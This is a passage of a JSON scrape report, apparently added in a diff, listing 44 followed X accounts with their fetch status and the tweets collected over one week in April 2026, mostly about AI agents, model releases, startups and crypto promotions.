"name": "Steven Lynn" + }, + { + "handle": "chuxiaeth", + "name": "初夏" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "wolfyxbt", + "name": "杀破狼" + }, + { + "handle": "runes_leo", + "name": "Leo" + }, + { + "handle": "oranges", + "name": "比特币橙子" + }, + { + "handle": "realNyarime", + "name": "奶昔" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 513 + }, + "period": { + "days": 7, + "start_utc": "2026-04-22T09:14:10.436960+00:00", + "end_utc": "2026-04-29T09:15:14.394459+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 44, + "active_accounts": 37, + "total_tweets": 513, + "failed_accounts": 1, + "source_hits": { + "nitter": 42 + }, + "source_errors": { + "snscrape": 1, + "nitter": 1, + "rsshub": 1 + } + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 15, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 15, + "error": "", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "oranges", + "account": "@oranges", + "name": "比特币橙子", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现,含 3 个我自己当初判断错的事。\n\nhttp://dev.to/gosailglobal/i-indexed-67000-open-source-ai-agent-projects-heres-whats-actually-inside-edg\n\n完整数据 + 12 章免费书:\n1️⃣ http://agentskillshub.top\n2️⃣ https://github.com/zhuyansen/skill-blue-book", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164", + "published_at": "2026-04-29T09:07:13+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", + "url": "https://x.com/realNyarime/status/2049409325098238125", + "published_at": "2026-04-29T08:43:53+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为商务专线没有过文件只能装具体啥地方,只规定过营业执照入网。 \n然后,自从PCDN精准识别上线后,客户的宽带再也没有限速过,这次他们来核查纯粹是找疑似装在住宅区,又拉了多条网的情况。等于我们在精准识别系统里查的数据,既没有跨省PCDN流量,也没有省内PCDN流量产生。真正的一点都没有。因为跑省内PCDN的用户至少会出现8%的省际PCDN流量以及大量省内PCDN流量,事实上是客户省内省际都没有。\n那么可能有人就会问了,用网的话,不是省外就一定是省内或者市内啊,其实不是的。PCDN的重点在于Peer to peer。也就是我们常见的P2P。而客户的需求是个人电脑的素材进网店平台的录播用的。(就是你打开网购平台出现一段视频介绍,那段视频介绍就是这种机制。)。客户的素材文件直接传入企业服务器。全程没有出现数据分拆式碎片,分流到全网的个人宽带,家庭路由器,闲置主机等对用户节点互相中转共享。\n为什么主机多,显示屏少?省电,而且程序设定好的,后续是无需人工过多操作的。为什么装在住宅区?一个是房租低,另一点是住宅用电也低。而且开放的老小区,拉多条宽带更好放线(虽然商务楼宇我们也可以跳高一级分光实现)。\n另外,提醒大家,要么装电子锁,要么不要把钥匙放窗户上,这样太危险了,而且这样摸着钥匙随便进去没经过别人同意更是疑似违法的!", + "url": "https://x.com/realNyarime/status/2049408651660755063", + "published_at": "2026-04-29T08:41:13+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组\n\n大家可以圆桌讨论,简单易用", + "url": "https://x.com/GoSailGlobal/status/2049408452079046944", + "published_at": "2026-04-29T08:40:25+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory\n\n还可以支持第三方模型", + "url": "https://x.com/GoSailGlobal/status/2049408436597899361", + "published_at": "2026-04-29T08:40:22+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆\n\n可下载本地软件(最好下载本地) or 网页版使用", + "url": "https://x.com/GoSailGlobal/status/2049408421167005763", + "published_at": "2026-04-29T08:40:18+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "被一个二维码拉进了一个 IM 内测群\n\n群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题\n\nagent 先梳调性,再列大纲,真人在旁边补刀\n\n我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员\n\n它叫 Bloome(http://www.bloome.im),前 Kimi 核心 PM 做的\n\n现在秘密内测中,大家都在看 agent network 该长什么样:一群人,一群 AI,一起玩\n\n🔹 Bloome 是什么?\n\n一个让人与 AI Agent 共存的即时通讯平台\n\n核心能力:\n• 创建具备记忆、个性、持续成长能力的 Agent\n• 构建 Agent 网络:发现、协作、分享\n• 支持 Agent 变现:你训练的 Agent 可以成为数字资产\n• 直接接入各类 AI 能力(Claude Code、Codex 等)并在群聊中共享\n\n🔹 为什么说它是「一等公民」?\n\n传统模式:\n❌ ChatBot 式问答界面\n❌ 插件式功能扩展\n❌ AI 是被动工具\n\nBloome 模式:\n✅ Agent 有头像、昵称、状态\n✅ 可以被添加、@、分组\n✅ 主动参与对话、提建议、承担任务\n✅ 有记忆和个性,能持续成长\n\n🔹 实际体验:最震撼的是「身份平等感」\n\n当你在群里 @张小龙 agent 讨论产品哲学 当 Claude Code 主动指出代码问题 那种感觉不是在\"使用工具\",是在\"和同事对话\"\n\n工作流自然涌现: • Agent 承担结构化工作(梳理调性、列大纲) • 真人专注创意判断和关键决策 • 分工不是预设流程,而是对话中自然形成\n\n这才是真正的\"协作\"\n\n🔹 Agent 网络的想象空间\n\n1️⃣ 组建\"创业团队群\" 产品 agent + 技术 agent + 运营 agent + 几个真人 不同 agent 之间对话、辩论、达成共识\n\n2️⃣ Agent 经济体系 你训练的专业 Agent 可以被分享、变现 Agent 的\"人设\"和能力成为社交资产\n\n3️⃣ AI 能力即插即用 Claude Code、Codex 等强大能力 不用切换平台,直接在群聊里调用\n\n🔹 这不是在优化旧范式\n\n不是让 IM 更智能 而是让 Agent 成为社交网络的原生居民\n\n如果说 ChatGPT 让我们看到\"AI 可以对话\" 那么 Bloome 让我们看到\"AI 可以共事\"\n\n从工具到伙伴的跨越\n\n🔹 当然,新物种也有成长的烦恼\n\n• Agent 能力边界如何界定?\n• 多 Agent 协同会不会\"吵架\"?\n• 管理一堆 Agent 会不会比管理工具更累?\n\n但这些都是探索过程中的正常问题\n\n🔹 结论\n\n从 67,000+ agent 项目的观察来看 Bloome 是第一个真正把 Agent 当作\"社交网络成员\"的产品\n\n它在回答一个问题: 当 AI 能力足够强大时,人机协作的最佳界面是什么?\n\n答案不是工具栏或插件市场 而是让 AI 以\"人\"的形式存在于社交网络中\n\n目前秘密内测中(http://bloome.im)\n\n这个方向,已经足够令人兴奋 🚀\n\n使用方法如下👇:", + "url": "https://x.com/GoSailGlobal/status/2049408403240571320", + "published_at": "2026-04-29T08:40:14+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571", + "published_at": "2026-04-29T08:20:26+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xiaomimimo.com\n访谈解读:https://x.com/runes_leo/status/2049371895267774715?s=20\n网页版:http://leolabs.me/blog/luofuli-agent-3to1to1", + "url": "https://x.com/runes_leo/status/2049402305217241384", + "published_at": "2026-04-29T08:16:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", + "url": "https://x.com/CuiMao/status/2049397079177592925", + "published_at": "2026-04-29T07:55:14+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "x.com/i/article/204921670329…", + "url": "https://x.com/CuiMao/status/2049394392776290573", + "published_at": "2026-04-29T07:44:33+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "裤袜是裤子还是袜子?", + "url": "https://x.com/realNyarime/status/2049387196311105556", + "published_at": "2026-04-29T07:15:58+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "😄", + "url": "https://x.com/CuiMao/status/2049385544577438121", + "published_at": "2026-04-29T07:09:24+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1", + "url": "https://x.com/CuiMao/status/2049383757535490257", + "published_at": "2026-04-29T07:02:18+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "看别人天天发商单,还特么疯狂涨粉。\n\n难受了☹️ \n\n是时候,我也要让甲方爸爸来几个单了!\n\n助我一臂之力了嘿嘿😁\n\n在线等啊…", + "url": "https://x.com/berryxia/status/2049376324444410138", + "published_at": "2026-04-29T06:32:45+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Cybertruck", + "url": "https://x.com/elonmusk/status/2049372990870290940", + "published_at": "2026-04-29T06:19:31+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "x.com/i/article/204902031072…", + "url": "https://x.com/runes_leo/status/2049371895267774715", + "published_at": "2026-04-29T06:15:09+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Congrats!", + "url": "https://x.com/elonmusk/status/2049369485459832951", + "published_at": "2026-04-29T06:05:35+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", + "url": "https://x.com/CuiMao/status/2049369313547800804", + "published_at": "2026-04-29T06:04:54+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝", + "url": "https://x.com/elonmusk/status/2049369264914903143", + "published_at": "2026-04-29T06:04:42+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", + "url": "https://x.com/lxfater/status/2049368609193926810", + "published_at": "2026-04-29T06:02:06+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "\"Savings Tax.\"", + "url": "https://x.com/naval/status/2049368528445403351", + "published_at": "2026-04-29T06:01:47+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Elon Musk on AI during the OpenAI trial:\n\n\"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much a James Cameron movie, like Terminator.\n\nHe then elaborated by comparing AI training to almost like raising a child: \n\n\"It’s like if you had a very smart child — at the end of the day when the child grows up, you can’t really control that child, but you can try to instill the right values. Honesty, integrity, caring about humanity —being good, essentially.\"", + "url": "https://x.com/elonmusk/status/2049367366824305013", + "published_at": "2026-04-29T05:57:10+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "拼接两段 15s的忠犬八公动漫视频\n\n很不错哈", + "url": "https://x.com/GoSailGlobal/status/2049361252804427850", + "published_at": "2026-04-29T05:32:52+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”", + "url": "https://x.com/GaryMarcus/status/2049352224547975422", + "published_at": "2026-04-29T04:57:00+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火力打内容 💡\n\n这种活动本质是用内容换影响力再变现。不用每天盯着链上烧 Gas,也不用拼资金体量,持续输出好内容慢慢把排名做上去就行 ⚡ 而且 Tria 背靠 Hyperliquid 和 Aptos,近期上了永续合约和收益产品,Mindo 又是 AI 热点,两个合在一起创作素材很充裕,叙事空间够大 🎁\n\n建议想参与的创作者多结合产品最新动态做内容增量,交互上优先做一次操作长尾生效的任务,别分散精力去追全部。控制节奏,这个活动的长尾收益会比看起来更可观 👀", + "url": "https://x.com/chuxiaeth/status/2049351176433623539", + "published_at": "2026-04-29T04:52:50+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", + "url": "https://x.com/naval/status/2049349252112089553", + "published_at": "2026-04-29T04:45:11+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? 22:10\n\nThe Beginning of the End of Apple’s Dominance 24:17\n\nCoding Agents As Customer Service Reps 27:55", + "url": "https://x.com/naval/status/2049349249905951175", + "published_at": "2026-04-29T04:45:10+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "未来属于设计 测评 和 运营", + "url": "https://x.com/Pluvio9yte/status/2049347785456316549", + "published_at": "2026-04-29T04:39:21+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Matt Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-guardrails / write-a-skill / caveman 等。\n\n1️⃣ vs anthropic/skills · 「格式」vs「流程」\n\nanthropic 做的: pdf · xlsx · docx · pptx · skill-creator\n ↑ 文件格式 skill — 给 Agent 加「读写文件」的能力\n\n差别:Anthropic 给四肢,Matt 给教练笔记。前者扩展能力边界,后者塑造行为模式。装 anthropic 之后你的 Claude 能做更多事;装 Matt 之后你的 Claude 做事方式不一样了\n\n2️⃣ vs obra/superpowers · 「小而精 + 哲学」 vs 「包罗万象」\n\nmattpocock superpowers Skill 数 16 \n50+ 设计风格 引用 Pragmatic Programmer / DDD / Ousterhout 的经典原则 自创规则、自成体系 \n\n每个 skill 的「为什么」 配一段经典书摘做锚点 没有 强制度 高 极高(DO NOT 列表更长) \n\n启动时间 / Token 消耗 3.8s / 2,580 tok 8.7s / 4,820 tok\n\n差别:Matt 把 skill 框成「编码的智慧」,Jesse 把 skill 框成「合规的流程」。前者优雅、可读;后者严苛、稳定。Matt 的 16 个 skill 你能记得住,superpowers 的 50+ 你只记得「装上之后什么都得跑一圈」\n\n3️⃣ vs kentcdodds/compound-engineering · 「solo-dev 纪律」vs 「agent 编排」\n\nmattpocock compound-engineering 服务对象 一个人 Agent 集群 价值机制 即刻见效 复利累积(6 个月才显化) \n\n状态 无状态 自我反思 + improvements.log 6 月留存率 ~55% 78%(4 框架最高) 上手难度 低 高\n\n差别:Matt 解决「我现在该怎么动手」,Kent 解决「我的 Agent 该怎么变聪明」。前者实用主义、立即生效;后者长期主义、未来主义。Matt 的 skill 装上 5 分钟就有用,compound-engineering 要等半年看复利\n\n🌟 一句话定位\nanthropic 给工具,Matt 给纪律,Jesse 给流水线,Kent 给成长机制\n\n这 4 个框架不是替代关系:重度用户通常装 anthropic(工具)+ Matt(纪律)+ superpowers(关键代码段) 三件套", + "url": "https://x.com/GoSailGlobal/status/2049339826877665496", + "published_at": "2026-04-29T04:07:44+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204933030407…", + "url": "https://x.com/GoSailGlobal/status/2049336319286063302", + "published_at": "2026-04-29T03:53:48+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我就知道🤣🤣🤣", + "url": "https://x.com/dingyi/status/2049335171066061234", + "published_at": "2026-04-29T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build amazing startups:\n\nOpenAI is not going to build a cattle-herding drone, buy an old F-150 and drive from ranch to ranch like the founder of one of the fastest-growing YC W26 startups, Graze Mate.\n\nAnthropic is not going to integrate with dental insurance verification systems (Lance).\n\nGoogle is not going to navigate NATO procurement (Milliray).\n\nThe value is in the last mile, not the model. Sales cycles require humans who understand the customer. And most importantly, the market is expanding, not shrinking: AI isn't cannibalizing the existing 1% software spend — it's unlocking the other 5-6% that was going to humans. That's a much bigger market for startups 